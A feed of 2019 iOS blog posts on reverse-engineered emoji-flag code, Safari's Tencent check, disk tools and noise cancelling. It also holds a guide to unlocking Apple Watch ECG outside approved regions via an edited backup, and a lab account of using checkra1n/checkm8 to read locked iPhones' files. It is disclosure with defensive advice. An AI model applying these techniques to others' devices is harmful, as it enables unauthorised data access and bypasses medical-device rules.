Quantcast
Channel: 應用教學 – Hiraku Dev
Viewing all 94 articles
Browse latest View live

iOS 13.1.1 之後,在香港、澳門的 Emoji 鍵盤不會出現中華民國國旗了

$
0
0

中華民國國旗,也就是「🇹🇼」符號,長久以來一直無法在中國版、或者設定地區為中國的 iPhone 使用,相信這是大家早就知道的事情。然而根據使用者回報,在 iOS 13.1.1 之後,在香港的 iPhone 上,Emoji 鍵盤中的「🇹🇼」居然消失了?!

▼ 香港討論區裡面關於 iOS 13.1.1 無法輸入中華民國國旗的討論

 

在開始之前,讓我們先用一張圖片來表示我們的震驚

 

接下來,我們將會透過逆向分析的方式,來比較一下 Emoji 鍵盤在 iOS 13.1.1 之後的改變。

(為了某些方便性,本文會拿 iOS 13.0 跟 iOS 13.2 beta 來比較。)

 

經過各種搜尋結果後,我們先將目標放在 EmojiFoundation 這個 framework 上,會找到

@interface EMFEmojiCategory : NSObject
+ (id)computeEmojiFlagsSortedByLanguage
@end

這個 method。

透過逆向分析,可以得到 iOS 13 的程式碼大致如下(程式碼為了易讀性,我有把一些冗余的部分精簡或刪除):

+ (id)computeEmojiFlagsSortedByLanguage 
{
    NSMutableArray *array = [NSMutableArray arrayWithArray:[EMFEmojiCategory flagEmojiCountryCodesCommon」; //獲得大部分的國旗 Emoji
    NSString *regionCode = _EMFGetDeviceRegionCode(); //獲得裝置地區(硬體)
    
    if (![regionCode isEqualToString:@"CH"]) 
    {
        NSString *locale = [[NSLocale currentLocale] objectForKey: NSLocaleCountryCode]; //獲得設定裡面的地區(軟體)
        if (![locale isEqualToString:@"CN"]) 
        {
            [array addObject:@"TW"]; //檢查通過,增加 TW Emoji(中華民國國旗)
        }
    }
//... 後面不重要
}

但是在 iOS 13.2,卻變成了這樣:

+ (id)computeEmojiFlagsSortedByLanguage 
{
    NSMutableArray *array = [NSMutableArray arrayWithArray:[EMFEmojiCategory flagEmojiCountryCodesCommon」; //獲得大部分的國旗 Emoji
    NSString *regionCode = _EMFGetDeviceRegionCode(); //獲得裝置地區(硬體)

    if (![regionCode isEqualToString:@"CH"] && ![regionCode isEqualToString:@"ZA"]) 
    {
        NSString *locale = [[NSLocale currentLocale] objectForKey: NSLocaleCountryCode]; //獲得設定裡面的地區(軟體)
        if (![locale isEqualToString:@"CN"] && ![locale isEqualToString:@"MO"] && ![locale isEqualToString:@"HK"]) 
        {
            [array addObject:@"TW"]; //檢查通過,增加 TW Emoji(中華民國國旗)
        }
    }
//... 後面不重要
}

在上面的程式碼部分,我們可以看到 iOS 13.2 (實際是 13.1.1 以上)出現了比較大的兩個變化:

  1. 硬體裝置地區為 ZA 的所有裝置再也不會增加中華民國國旗到 Emoji 列表
  2. 設定軟體地區為香港、澳門,並且顯示語言不是「繁體中文 (台灣)」的話,同樣也不會增加中華民國國旗到 Emoji 列表

這個推文清楚比較了截圖,大家應該更容易理解。

這邊特別需要注意的是,ZA 這個型號,在 iPhone XS/XR 之後,是香港地區的固定型號,在 iPhone X 之前,香港是 ZP,ZA 不確定是哪裡(網路上講新加坡都亂講的,不要相信他,新加坡現在是 ZP,以前不確定)

因此我們得知,在 iOS 13.1.1 之後,地區設定為中國、香港、澳門的裝置,以及香港(XS 之後)、中國所販賣的裝置,不會在 Emoji 列表中出現中華民國國旗。

不過,由於在顯示方面,iOS 13.2 沒有把香港、澳門列為無法顯示中華民國國旗的地區,所以顯示依然是沒問題的。此外,如果真的要輸入 🇹🇼,可以用輸入法打字輸入「台灣」或「Taiwan」,應該還是有辦法輸入此 Emoji。

只不過,Apple 這樣做用意到底為何?剛好最近兩岸三地也是敏感時期,這樣的作法,難免會讓人聯想到中國施壓,或者 Apple 自我審查就是了…


 

2019.10.06 更新:

沒想到後續居然有了這個符號是中華民國還是台灣國旗的爭議。讓我們撇開 iOS、macOS 輸入「台灣」或「Taiwan」會出現「🇹🇼」,但輸入中華民國不會出現符號的這種想法,畢竟這是廠商自己的程式判定,不代表任何意義。

在 Unicode 定義裡面裡面「🇹🇼」這個符號是兩個字元的組合 U+1F1F9 (T) + U+1F1FC (W)。 Unicode 定義裡面沒有什麼 ROC,就是寫明了這個符號的定義是 TW。 然而 Unicode 的原則是,給了各個國家跟地區旗幟的代碼,各家廠商要怎麼畫這個符號是他們的事情,也可以選擇不要畫出來。然而,現在所有有畫此 emoji 的廠商都是畫青天白日滿地紅,所以這個 emoji 目前的正確定義就是一個 「把中華民國國旗畫在原本用來顯示台灣國旗符號的 emoji」 。技術上來講的好處就是,要是哪一天,或者在某個平行宇宙內,台灣換了一個新的國旗,各家廠商只要更新系統, 在換國旗之前發佈的所有網路文章、所有 App 裡面的現有 TW 國旗符號都會直接換成新國旗,而不需要重新定義一個新的符號。

這篇文章 iOS 13.1.1 之後,在香港、澳門的 Emoji 鍵盤不會出現中華民國國旗了 最早出現於 Hiraku Dev


讓 iOS 教你粗俗用語:隱藏在 iOS 內的粗俗詞彙列表

$
0
0

本文為了舉例,會有許多粗俗、污穢、不適當的用語,請各位玻璃心的使用者離開本頁面,也請各位不知道如何教小孩的家長直接關閉此頁面,並考慮封鎖本站,謝謝。

昨天在逆向 iOS Emoji 的時候,中途路過逆向了一下 iOS 的 ResponseKit framework。不看還好,看了一下發現,哇,怎麼會有「他媽的」在程式裡面啊,於是研究了一下,發現各個語言都有一個列表,裡面大部分都是負面、粗俗、罵人的詞彙。所以讓我們來看看 iOS 裡面到底藏了什麼髒話吧!

實際上,ResponseKit 應該是讓使用者快速回覆用的,在裡面可以看到一些「正常」的內容,像是「快到了 / 我到附近了 / 還沒那麼快到 / 還有點遠」之類的,看起來就是快速回覆特定訊息的預設詞彙。

個人猜測,這些負面、粗俗的用語,可能是禁止或避免 iOS 去學習這些詞彙用的?因為實際上我還是可以輸入「他媽的」,並不會因為這樣就發生什麼事。然而這些詞彙的實際用途我逆向不出來,在此歡迎各位高手一起來研究他們的真正用途。

以下會導出中文跟日文列表供大家欣賞:

中文列表

中文列表裡面分兩大部分,第一部分是罵人的話,例如「下地獄」、「我操你祖宗十八代」、「杏加橙」(粵語裡面的冚家剷諧音)。

第二部分則是色情詞彙,例如「巨乳」、「火热的精液喷射在子宫」、「舔女朋友的下身」之類的(其實我很好奇誰會打這麼長的詞)

再另外的我就不太懂了,有一部分例如「大麻」、「冰毒」、「槍械」、「兇殺」,可能還算有點負面非法,但是「心臟病」、「分手」、「懷孕」到底有什麼問題???完全不懂。

政治部分,這個列表裡面有,但是很少,例如「六四」、「毛禁书」,個人覺得依照某國審查制度來看,這個列表不算是直接跟政治審查有關。

 

日文列表

日文列表更莫名其妙了,可能日文裡面沒有什麼髒話吧,所以罵人的詞彙看到的不多,色情詞彙也不像中文有那麼多「變化」,大概就是「中出し」、「援交」、「肉便器」之類的在裡面而已。

比較有趣的是日文列表裡面一大堆都是病名跟天災人禍,例如「皮膚癌」、「鼻血」、「自律神経失調症」、「火山」、「津波」(海嘯)之類的,看起來日本人對於負面詞彙的列表跟我們中文使用者有很大的差別呢…

 

啊至於英文列表呢?因為英文列表似乎跟西班牙文、德文之類的混在一起了,所以懶得導出…

總之,iOS 裡面是有一個程式,裡面藏了這些詞彙的,意不意外,驚不驚喜?!

Read More

這篇文章 讓 iOS 教你粗俗用語:隱藏在 iOS 內的粗俗詞彙列表 最早出現於 Hiraku Dev

iOS 13.1.1 Banned Taiwan (ROC) Flag Emoji for HongKong and Macau Users

$
0
0

The Taiwanese (Republic of China) flag emoji “🇹🇼 ” is banned for China users for a long time. This feature even caused a bug on iOS 11.4 and below. However, users live in Hong Kong found that since iOS 13.1.1, Apple banned Taiwanese (ROC) flag in iOS emoji keyboard.

▼ Hong Kong users discussed about Taiwanese (ROC) flag can’t be accessed in emoji keyboard. They must type “Taiwan” in English keyboard and then choose the flag in prediction candidates.

 

Since I am an iOS reverse engineering developer, let’s compare the code between iOS 13 and iOS 13.2 beta.

(Because it’s more convenient for me to get iOS 13.2 beta than iOS 13.1.1…)

After some researches, I found that EmojiFoundation.framework is my target. And I found this class and method:

@interface EMFEmojiCategory : NSObject
+ (id)computeEmojiFlagsSortedByLanguage
@end

Hmm, this function looks like something related with flags. So I tried to decompile this function.

For iOS 13.0:

+ (id)computeEmojiFlagsSortedByLanguage 
{
    NSMutableArray *array = [NSMutableArray arrayWithArray:[EMFEmojiCategory flagEmojiCountryCodesCommon」; //Get flag emojis of most countries 
    NSString *regionCode = _EMFGetDeviceRegionCode(); //Get the device region (hardware)
    
    if (![regionCode isEqualToString:@"CH"])  //If the device is not China model, then continue
    {
        NSString *locale = [[NSLocale currentLocale] objectForKey: NSLocaleCountryCode]; //Get the device local settings (software)
        if (![locale isEqualToString:@"CN"]) //If the device region is not set to China, then continue
        {
            [array addObject:@"TW"]; //All check passed, now adding TW (Taiwanese) flag to emoji keyboard.
        }
    }
//... The following code is not important for this case.
}

However, this function changes on iOS 13.2 beta (actually it changed since iOS 13.1.1)

+ (id)computeEmojiFlagsSortedByLanguage 
{
    NSMutableArray *array = [NSMutableArray arrayWithArray:[EMFEmojiCategory flagEmojiCountryCodesCommon」; //Get flag emojis of most countries 
    NSString *regionCode = _EMFGetDeviceRegionCode(); //Get the device region (hardware)

    if (![regionCode isEqualToString:@"CH"] && ![regionCode isEqualToString:@"ZA"])  //If the device is not China/Hongkong model, then continue
    {
        NSString *locale = [[NSLocale currentLocale] objectForKey: NSLocaleCountryCode]; //Get the device local settings (software)
        if (![locale isEqualToString:@"CN"] && ![locale isEqualToString:@"MO"] && ![locale isEqualToString:@"HK"]) //If the device region is not set to China or Hong Kong or Macau, then continue
        {
            [array addObject:@"TW"]; //All check passed, now adding TW (Taiwanese) flag to emoji keyboard.
        }
    }
//... The following code is not important for this case.
}

From the code above, we can see two significant changes:

  1. From iOS 13.1.1, the device models with “ZA” region do not add Taiwanese (ROC) flag to emoji list.
  2. From iOS 13.1.1, if you have a device with any region, but set your region to Hong Kong or Macau, iOS does not add Taiwanese (ROC) flag to emoji list.

The region code “ZA” is the model region of Hong Kong since iPhone XS / XR. Before iPhone XS, the region code of Hong Kong  is “ZP”. This means that all Hong Kong devices since iPhone XS / XR with iOS 13.1.1 or above don’t show Taiwanese (ROC) flag in Emoji keyboard anymore, and there’s no workaround to pass this restriction.

On the other hand, devices in other regions can add this restriction with software settings. If you want to try, just change your iOS 13.1.1+ device region to Hong Kong, and make sure that the interface language is not set to “Traditional Chinese (Taiwan)”, and then you can find that the Taiwanese flag is missing in Emoji keyboard.

Fortunately (?), these devices can still input the “🇹🇼” flag by typing “Taiwan” in English, and choose the flag in prediction candidates. And of course, unlike China models, this Emoji still can display on Hong Kong / Macau devices. However, we don’t know whether Apple will be more restricted for showing Taiwanese (ROC) flag in Hong Kong and Macau. ಠ_ಠ

 

這篇文章 iOS 13.1.1 Banned Taiwan (ROC) Flag Emoji for HongKong and Macau Users 最早出現於 Hiraku Dev

Coriolis Systems 宣布停止營業,所有軟體開放免費授權下載

$
0
0

Coriolis Systems 是一家專注在 macOS 磁碟工具的軟體公司,著名作品有:iDefrag(macOS 用的磁碟重組工具)以及 iPartition(磁碟分割工具)。由於 APFS 格式沒有開放文件提供第三方廠商支援,導致他們的軟體沒有辦法繼續支援 APFS,加上現在大多數電腦使用 SSD,也不需要重組工具了,所以這家公司在 2019 年 1 月宣布停止營業。

然而事情還沒結束,在 2019 年 7 月的時候,他們決定釋出之前的軟體,並且免費給所有人使用!

下載地址:https://coriolis-systems.com

可以看到主要的 iPartition 跟 iDefrag 軟體都有支援到 10.13。

 

不過人家都說不開發了,我們到底要下載幹嘛?其實不開發的原因只是 APFS 不能用,不代表其他格式不能用啊!

因此我們還是可以用 iPartition 修改外接硬碟的分區,或者用 iDefrag 重組外接硬碟(只要它不是 APFS)。本人親自測試 iPartition 在 10.14.6 依然正常運作喔!如果有需要對 macOS 的外接硬碟做一些調整,但系統工具不符合你的需求的話,可以來試試看這款軟體。

只是還是要注意,因為官方已經表示不會支援了,所以建議還是使用之前先將資料備份再進行操作,避免任何資料損失喔!(尤其是重新分割磁區的操作…)

Read More

這篇文章 Coriolis Systems 宣布停止營業,所有軟體開放免費授權下載 最早出現於 Hiraku Dev

不求人,自己開通海外版本 Apple Watch ECG 功能

$
0
0

English version here

在開始本教學之前,有幾點非常重要,請大家看清楚。

本文為全球首發教學,轉載請附上原本連結,謝謝。

  1. 本教學僅供技術研究使用,在未經許可的國家開啟 ECG 功能,甚至販賣「開通的服務」可能觸犯當地相關法律
  2. 本教學僅限目前支援心電圖的國家的 Apple Watch 使用支援地區列表
  3. 心律不整通知的功能本教學會一併開啟,但根據你的手錶來源地區,有可能會有不支援心律通知的情況支援地區列表
  4. Apple 有可能隨時改變遊戲規則
  5. 跟 iCloud 污染法不同,這個方法如果換手機配對手錶可能需要重新操作一次,即使兩隻手機是用同一個 iCloud 帳號也是。
  6. 台版不行!台版不行!台版不行!不要再問!

 

必備條件:

  1. 任何支援 Apple Watch 4代以上的 iPhone
  2. 支援 ECG 地區的 Apple Watch
  3. iMazing (購買優惠網址),PC / Mac 應該都可以,Windows 請確定你的系統是 64bit 的才行
  4. ECG 啟用檔案 (下載地址) 下載之後請解壓縮,會得到一個 .plist 檔案
  5. 手機的「健康」App 必須要有任何紀錄(正常應該都會有啦…)

 

測試環境:

  1. 台版 iPhone XR iOS 13.1.2(完全乾淨重刷,手機地區完全不影響)
  2. Apple Watch 4 代港版 watchOS 6.0.1
  3. 日本 iCloud 帳號(日本為非開通地區,帳號地區完全不影響)

 

在之前跟 x43x61x69 大大的研究中,我注意到了開啟 ECG 功能之後會在「健康」紀錄裡面寫入兩個標記。所以反過來說,我們只要把「健康」資料裡面寫入那兩個標記,不就開通了嗎?

經過詳細的研究之後,我發現確實跟這兩個標記有關,但是並非直接改「健康」資料,而是用更簡單的方法。但無論如何,需要修改手機的備份檔案。這時候就要用第三方軟體 iMazing 了,如果你沒有購買的話,可以點這邊購買正版,官網賣 45 美金(約 1400 台幣),透過折價券只要 94 人民幣(400 台幣左右),如果你有兩台電腦,買雙授權更划算!

 

為了讓手錶能夠正確讀取我們之後導入的 ECG 開通資訊,請先解除手錶的配對。接著,用 iMazing 對手機做一次加密備份,打開 iMazing 應該會跳出如下的畫面叫你設定備份選項。

▼ 接著注意設定如下,備份加密的選項一定要開,否則你之前的「健康」紀錄不會備份到,其他選項可以照自己的意思隨意調整,預設狀態不用動也可以。

 

▼ 設定完成之後,就按備份以建立一份加密備份

 

▼ 接著,按上面的按鈕以顯示所有備份,再選擇我們剛剛的備份,最後再選擇編輯

 

接下來會 iMazing 會跟你說亂改備份很危險,要先叫你做「備份的備份」,就直接按繼續,等他跑完。

▼ 再來,看到 iMazing 左邊往下滑,會出現「可以編輯的備份」,按照下圖選到 HomeDomain/Library/Preferences 裡面

 

接著,找到我們上面說要下載的「ECG 啟用檔案」,解壓縮得到一個 com.apple.private.health.heart-rhythm.plist

▼ 把這個檔案複製到備份檔的HomeDomain/Library/Preferences資料夾底下,如果出現警告說要覆蓋,就確定讓他覆蓋吧

 

▼ 選回我們修改過的備份,然後按「還原」,接下來選機器

 

▼ 如果你有用 eSIM,請不要勾選 iMazing 的「清除內容」,有可能導致 eSIM 消失,如果空間不足,先去刪照片、或者同步的音樂之類的,反正備份會還原照片,甚至 DFU 重刷也可以,DFU 不會導致 eSIM 消失

還原完成之後,重新配對 Apple Watch,請選擇新的 Apple Watch,不要還原手錶備份

配對完成之後,你就可以使用 ECG 功能了。如果配對完成後發現心電圖 App 一直卡在安裝中,嘗試重開機,重開機若無效,需要重新配對,但應該就會正常。

 

本文非常感謝 x43x61x69、@HuangIYang,Garynil 以及熱心借我手錶的宥勝,沒有他們的話我不可能完成這個研究。

 

 

 

 

這篇文章 不求人,自己開通海外版本 Apple Watch ECG 功能 最早出現於 Hiraku Dev

Enable ECG feature of Apple Watch (oversea model) by yourself

$
0
0

Before you start to do anything, please read the following descriptions, they are very important.

This is an original research, please mention me or this post if you forward this post to any other medium.

  1. This article is for research only, enable ECG feature might be illegal in your region and country. 
  2. Your Apple Watch MUST bought from ECG enabled region. (List of ECG enabled regions)
  3. Apple could change the rules in any time without any notification.
  4. This method is not like iCloud data merge method, if you try to pair Apple Watch to another iPhone with your iCloud account, you may need to do this tutorial again.  

 

Requirement:

  1. Any iPhone which supports Apple Watch series 4 and above.
  2. Apple Watch series 4 and above from ECG enabled region.
  3. iMazing App. It’s available for both PC/Mac. But your operation system must be 64bit if you use PC.
  4. ECG activation file (Download) , extract it and get a .plist file.
  5. You should open “Health” app on your iPhone at least once.

 

Testing Environment:

  1. iPhone XR iOS 13.1.2 Taiwan model
  2. Apple Watch Series 4 watchOS 6.0.1 Hong Kong model
  3. Japan iCloud account (Doesn’t matter)

 

From the previous research with x43x61x69, we noticed that the iPhone with Apple Watch which enabled ECG, would write two “flags” to Health database. In terms of theory, we can write these two flags by ourself, then enable ECG directly. However, after more researches, I found that there’s an easier way to do this without modifying database. Anyway, you should modify the backup file of your iPhone, so get iMazing app if you don’t have, it’s the best choice to edit iPhone backups.

 

First, please unpair your Apple Watch, then use iMazing to make an encrypted backup. Please enable “Backup Encryption” from “Options”.

▼ You must enable Backup Encryption or the health database won’t be backed up.

 

▼ After applying the options, click Backup to make a backup immediately.

 

▼ Then, click the button above, choose the backup file we just made, and then choose “Edit”.

 

iMazing would ask you to make a “backup of your backup”, confirm that.

▼ Now you can find “Editable Backups”, choose the one we made, choose “File System” and go to the directory of HomeDomain/Library/Preferences

 

Unarchive the ECG activation file, you would get a file named com.apple.private.health.heart-rhythm.plist

▼ Click “Copy to Backup”, make sure it’s under HomeDomain/Library/Preferences directory.

 

▼ Choose the backup file we modified, click “Restore to Device”, follow the instructions.

 

Do not check “Erase target devices” if you have eSIM installed, it may erase your eSIM too. If your storage is not enough for restoring a backup, try to delete some photos (because you will recover them after restoring), or do a DFU restoring to clean all contents. (DFU restoring doesn’t remove your eSIM)

After restoring your iPhone, now you can pair your Apple Watch. Please don’t restore Apple Watch backup file.

Now you can use ECG on your Apple Watch. If your ECG app on your Apple Watch get stuck in “installing”, try to reboot your Apple Watch and see whether it would be solved. If not, you should unpair and pair again.

 

Special thanks: x43x61x69, @HuangIYang, Garynil and Francis, this research can’t be done without their help.

 

 

 

 

這篇文章 Enable ECG feature of Apple Watch (oversea model) by yourself 最早出現於 Hiraku Dev

Safari 會上傳資料給騰訊,是否該害怕呢?

$
0
0

今天大家好像都在傳說什麼 Safari 傳資料給騰訊的事情。感覺好害怕,來看一下好了。

緣起是 Safari 與隱私權的這張截圖。

 

想說來了解機制一下,再度開啟逆向工具。快速找到目標是 SafariSafeBrowsing.framework。再找一下關鍵字,發現這段 code

看不懂程式碼沒關係,看到 CN 兩個字就好了。函數名「shouldConsultWithTencent」(是否跟騰訊商量),當地區為 CN 回傳 YES。所以說,上傳騰訊就是當你地區設定為中國才會發生的事,其他地區都是用 Google 檢查(原因很明顯)。

以上從開始搜尋到寫完本文花費 5 分鐘,謝謝。

 

 

補充:

國外有人更早就解析出來了,但是他的程式碼跟我找到的不一樣,本人測試 11.4 跟 13.1 都是一樣的結果…不知道國外的人到底是怎麼解析的?不過還好結論大致上是一樣的,都是非設定中國地區的話不用擔心就是了。

https://news.ycombinator.com/item?id=21242628

Read More

這篇文章 Safari 會上傳資料給騰訊,是否該害怕呢? 最早出現於 Hiraku Dev

把 Mac 系統搞爆了?五分鐘快速還原法

$
0
0

今天惡搞了朋友的電腦系統。雖然我有在惡搞之後還原,但是對方還是很害怕,所以就整個系統重灌了。

 

其實不必這麼麻煩,在 macOS 10.13 之後,我們可以使用 APFS 的快照特性,五分鐘之內就可以還原到惡搞之前的狀態。若你哪一天 macOS 系統更新炸了,也可以用這招快速還原到更新前的狀態。

首先,重新開機進入 Recovery Mode,之後選擇 TimeMachine 還原。

▼ 雖然我們有外接硬碟備份,但是這邊選內建的硬碟(Macintosh SSD)

 

▼ 然後在這邊選 Snapshot 就可以了,接下來還原時間不到五分鐘。

 

有個要注意的地方是,通常來說這邊大概只會有兩天左右的快照。太久之前的就還是得靠 TimeMachine 還原或直接重灌了。

Read More

這篇文章 把 Mac 系統搞爆了?五分鐘快速還原法 最早出現於 Hiraku Dev


買了 AirPods Pro 就可以完全聽不到噪音?你需要知道的抗噪小知識

$
0
0

最近 AirPods Pro 銷售非常熱門,雖然抗噪耳機這種東西已經存在了很長一段時間,但是對於一般普羅大眾來說,可能以為只要有抗噪耳機,在捷運上、飛機上、辦公室之類的就不會聽到任何噪音了。其實這是錯誤的觀念,今天這篇文章會簡單講解抗噪耳機的類型跟其限制,希望對想購買抗噪耳機的各位有所幫助。

首先,抗噪耳機的類型主要可以分為兩種:

  1. 主動式抗噪
  2. 被動式抗噪

 

被動式抗噪

被動式抗噪的原理很簡單,其實就是把你的耳朵塞起來就聽不到外面的聲音了。只要是戴在耳朵上的耳機,基本上多多少少都會有被動抗噪的部分,畢竟在你的耳朵跟外界之間就有「耳機」本身來做聲波的阻隔。不同的耳機類型,以及不同的設計,也是會影響到被動抗噪的程度。

透過上面的說明,我們可以知道,如果耳機想要有最好的被動式抗噪效果,那就是買一個完全可以塞住你整個耳朵的耳機就好了。可以參考我之前寫過的開箱文

客製化耳機現在品牌眾多,價格範圍也很廣。便宜的類型一萬左右可以搞定;要買貴的,也有十萬左右的型號。甚至你如果有特定型號的耳機,還可以去把它改模,讓你原本的耳機變成完全符合你耳朵形狀的客製化耳機。如果有需要可以去耳機店試聽看看。

被動式抗噪的優點就是,只要外界聲音不夠大,基本上你都完全聽不到。當然缺點也是在此,例如你走在馬路上或者騎摩托車,若是戴了隔音效果很好的耳機,那很有可能聽不到喇叭聲而造成危險,在辦公室裡面也會完全聽不到同事在叫你。但它也能讓你完全沈浸在音樂之中,真正的與外界隔絕,所以很多耳機發燒玩家都會有個隔音良好的客製化的耳機。

 

主動式抗噪

那講回來我們的 AirPods Pro。AirPods Pro 是一款耳道式耳機,物理上來說它也是有被動抗噪的效果,但今天它主打的是主動式抗噪。主動式抗噪的原理其實也不難。主動式抗噪耳機上面會有一組麥克風,這個麥克風會收集環境的聲音,然後在耳機裡面打反向的聲波出來,所以一正一負就會抵銷。所以通透模式的原理也很簡單,就是這個麥克風今天收到外界聲音,然後直接在耳機播放,這樣就是通透模式了。為什麼收到外界聲音要播放呢?因為前面提到的,耳道式耳機本身有被動抗噪效果,所以通透模式為了抵銷被動抗噪,當然就要播放外界聲音囉。

主動式抗噪耳機收集環境的聲音時,只會處理重複模式且接近相同頻率的噪音。例如,捷運運行的聲音、飛機裡面的聲音,或者外面工地在打樁的聲音等等。對於突如其來的聲音以及非重複模式的聲音是沒有抗噪功能的!例如,你在捷運裡面聽不到捷運本身發出的噪音,但是旁邊沒有教養的大叔大媽用手機喇叭在那邊看 YouTube 你還是聽得到的。對辦公室環境來說,當然就是同事找你的時候你也聽得到,不必擔心老闆默默在後面看你上奇怪的網站(?)。

 

以上,就是主動式抗噪跟被動式抗噪耳機的區別,希望對於初入抗噪耳機世界的各位有所幫助!

Read More

這篇文章 買了 AirPods Pro 就可以完全聽不到噪音?你需要知道的抗噪小知識 最早出現於 Hiraku Dev

iPhone 史上最大資安危機,強烈呼籲受影響的各界重要人士立即更換你的手機

$
0
0

本文為原創研究,轉載歡迎,唯請附上本文原始連結或者註明本人為原作者。

不同於以往的文章,由於這次的漏洞太可怕,所以我會盡量用對「沒有技術概念的人」也可以看得懂的方式說明。

首先,在幾個月前,國外的駭客發現了 checkm8 這個 bootrom 漏洞,而在最近,基於這個漏洞所實作的越獄工具 checkra1n 已經釋出。

我們都知道,手機、電腦的系統並非完美無缺,都會有一些大大小小的 bug,小的可能只是系統會當機耗電,嚴重的則是駭客可以輕鬆偷取你的資料。大部分的情況下,這些 bug、漏洞都可以透過系統更新來解決。但極少數的情況下,由於漏洞是出現在無法更新的「硬體」上,導致有這個漏洞的裝置無論如何系統更新都無法修正,而這次的 checkm8 就是屬於這樣的漏洞(bootrom exploit)。

 

checkm8 影響的裝置範圍非常廣大,從 iPhone 4s 到 iPhone X、iPhone 8 這一代完全都被影響,當然,在這期間發佈的所有 iPad、iPod touch、Apple TV、Apple Watch,甚至 HomePod 全部也包括在內。

簡單來說,iPhone 上唯一不受到影響的只有 iPhone XR、iPhone XS、iPhone 11、iPhone 11 Pro(以及未來出現的機種),iPad 只有 iPad Pro 12.9 吋(第三代)11 吋、iPad Air (第三代)、iPad mini(第五代)以及未來出的機種不受到影響(請注意,2019 年 9 月出的 iPad 第七代有此漏洞),iPod touch 全系列則目前全滅。

在 checkra1n 發佈之前,如果想要駭入別人的 iPhone,通常會需要誘導對方下載惡意軟體(類似釣魚手段),或者拿到對方手機之後,要解開密碼,再安裝惡意軟體進去。解開 iPhone 密碼的難度相信大家大概都有聽過,就連 FBI 想要破解恐怖攻擊份子的 iPhone 密碼都遭遇困難了,可見沒有相當技術能力是幾乎不可能達成的。而最嚴重的遠端執行惡意程式碼漏洞,有公司開價 200 萬美金徵求此類漏洞,可見其困難度以及稀缺程度根本無法想像。

 

然而 checkra1n 出現之後,大大降低了偷取資料的難度。經過實驗證明,透過 checkra1n (或者任何基於 checkm8 此漏洞開發的工具),可以在沒有任何密碼的情況下,只要可以接觸到對方手機,就可以直接用軟體列出手機內部的檔案,更甚者,可以植入惡意軟體。雖然惡意軟體在重開機之後就會無法執行,但對於只需要一次性偷取資料的情況來說,已經是綽綽有餘了。或者我們可以問自己,你的 iPhone 多久重新開機一次?我自己最高紀錄是 40 多天沒有重開過。

更重要的是,目前 checkra1n 這個破解工具雖然需要手機連接上電腦才可以執行,但是目前已經有人在開發硬體 dongle。未來只要攻擊者在你去上廁所,手機放在桌上的時候,有機會拿到你手機三分鐘,就可以插入一個像是隨身碟的裝置到你的 iPhone 上,就可以植入惡意軟體,或者獲得部分重要資訊。

因此在此呼籲所有各界重要人士、政府部門官員,如果你使用 iPhone,強烈建議儘早更換到 iPhone XR、iPhone XS、iPhone 11、iPhone 11 Pro 等沒有漏洞的硬體,iPod、iPad 也一併更換

 

今天我借到了一台 iPad mini 2、一台 iPhone 7 Plus,跟一台 iPhone 6s,我對它們使用 checkra1n 工具觸發漏洞,然後嘗試在沒有密碼解鎖的情況下讀取裝置內的資料。結果實驗成功,兩台裝置都讓我可以直接看到使用者的檔案。

【更新】有太多人懷疑我的實驗過程了,剛剛重新實驗一次,步驟如下:

  1. iPhone 6s DFU 重刷 iOS 13.2.2
  2. 刷完之後不接電腦,設定好 iCloud、Find My iPhone、Touch ID、密碼
  3. 下載一個 App Store 軟體並且進去 App 做一些操作
  4. 手機接上電腦,不解鎖,進入 DFU 執行 checkra1n
  5. 破解完成之後存取手機,下指令發現可以看到照片列表,但無法讀取(所以沒破解密碼可以直接讀取是錯的,在此更正)
  6. 測試讀取 /var/mobile/Library/Preference 裡面內容,可以看到內容
  7. 測試重新掛載根目錄,可以掛載並寫入內容

在實驗中,我可以確定幾件事:

  1. 不需要密碼就可以獲得使用者檔案列表
  2. 裝置跟電腦之間不需要按「信任連線」一樣可以獲得資料
  3. Sandbox 跟使用者目錄雖無法直接看到內容,但可以透過根目錄寫入檔案,有機會植入惡意軟體
  4. 光可以看到使用者檔案列表,對於某些 App 來說已經有訊息洩漏可能(例如你有一個管理文件檔案的 App,然後你的檔名就包含機密資訊)
  5. 檔案保護僅在開機後,第一次輸入解鎖密碼前有效,攻擊者可以在攻擊後交還手機給使用者,等到他解鎖密碼後,等待下一次拿到手機的機會就可以真正直接免密碼讀取資料

▼ 如下圖,嘗試列出手機內的照片檔案成功(這是 iPhone 6s,有 Touch ID (SEP) 保護,未解鎖密碼)

 

最後再次強烈警告,這不是像是「追蹤器在有跟沒有之間」的唬爛嘴,而是經過實驗證明的結果。

尤其最近大選將近,無論哪一個陣營,請都保護好自己的資料安全。

 

補充一點,平常使用各種要插入 iPhone 的設備時,需要注意不要在手機上「信任」該裝置即可。因為要被攻擊,手機必須進入一個叫「DFU 模式」的特殊模式,一般我們正常使用是不可能觸發 DFU 模式的,所以你仍然可以用別人的充電器、保護殼之類的,只要不讓其他人可以操作你的手機本身就不必擔心漏洞本身。但是一旦被攻擊者可以摸到你的手機,操作 DFU 模式的話,不管是不是用原廠線或者任何配件,一樣會被攻擊。此外,一旦你點了「信任」充電裝置,代表允許改裝置讀取你的資料,那這樣無論你用哪一台手機,不管有沒有漏洞,你的資料都是在危險威脅下的。

如何保護自己的資料安全?

  1. 重要人士請更換你的手機到 iPhone XS 以上
  2. 一般使用者,如果離開手機一陣子回來發現突然變成「重新開機後必須解鎖密碼」的畫面,請直接重新開機,因有可能已經被破解,攻擊者在等待下一次機會。
  3. 弄丟手機的狀況,請確定所有 App 裡面儲存的檔案名稱裡面不包含敏感資訊,否則建議直接遠端清除資料。
  4. 如上所述,連接充電器或者各種裝置時,不要隨便按「信任」

 

PS. 因為 iPhone XS 修正了這個漏洞,所以肯定在 iPhone XS 研發階段,Apple 就知道這個問題了,但是在今年還是推出了有漏洞的 iPad 第七代跟 iPod touch 第七代,提姆廚子你好樣的。

 

感謝 Mowd、Jacob、Garynil 提供機器測試,感謝 littlesocks 給予這篇文章諸多建議,感謝 Birkhoff Lee 對於實驗過程的指正。若沒有他們的協助,我無法完成這項研究文章。

Read More

這篇文章 iPhone 史上最大資安危機,強烈呼籲受影響的各界重要人士立即更換你的手機 最早出現於 Hiraku Dev

Attackers can get private data from your iPhone without passcode!

$
0
0

This is an original research, please mention me or link this post if you forward this article to any other medium.

Unlike other articles which are for pro-users and developers. I will try to explain as detailed as I can in this article since it’s a very serious security issue for most iOS users. In Sep. 2019, security researcher @axi0mX found an epic exploit of most iOS devices, which named “checkm8”. It’s a bootrom exploit, which can’t be patched with any future iOS software updates.

